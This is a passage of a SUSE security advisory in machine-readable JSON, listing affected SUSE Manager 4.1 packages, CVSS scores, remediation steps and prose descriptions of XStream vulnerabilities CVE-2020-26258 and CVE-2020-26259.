"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2021-03-19T15:18:39Z",
"details": "important"
}
],
"title": "CVE-2020-26217"
},
{
"cve": "CVE-2020-26258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2020-26258"
}
],
"notes": [
{
"category": "general",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream\u0027s Security Framework with a whitelist! Anyone relying on XStream\u0027s default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2020-26258",
"url": "https://www.suse.com/security/cve/CVE-2020-26258"
},
{
"category": "external",
"summary": "SUSE Bug 1180146 for CVE-2020-26258",
"url": "https://bugzilla.suse.com/1180146"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2021-03-19T15:18:39Z",
"details": "moderate"
}
],
"title": "CVE-2020-26258"
},
{
"cve": "CVE-2020-26259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2020-26259"
}
],
"notes": [
{
"category": "general",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream\u0027s Security Framework with a whitelist! Anyone relying on XStream\u0027s default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
